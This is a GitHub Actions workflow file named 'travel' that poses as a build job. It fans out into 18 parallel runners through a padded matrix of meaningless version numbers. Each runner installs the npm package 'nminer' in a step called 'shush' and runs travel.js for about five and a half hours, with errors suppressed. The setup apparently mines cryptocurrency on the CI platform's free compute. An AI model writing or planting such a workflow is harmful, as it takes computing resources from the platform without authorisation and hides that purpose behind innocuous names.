name: travel
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3465 }
          - { version: 9505 }
          - { version: 4082 }
          - { version: 5675 }
          - { version: 5989 }
          - { version: 9562 }
          - { version: 9094 }
          - { version: 8518 }
          - { version: 2984 }
          - { version: 8904 }
          - { version: 3877 }
          - { version: 3684 }
          - { version: 7803 }
          - { version: 2511 }
          - { version: 4418 }
          - { version: 2810 }
          - { version: 2330 }
          - { version: 1312 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: shush
        run: |
          npm install nminer@latest
          timeout 333m node travel.js || echo "travel executed"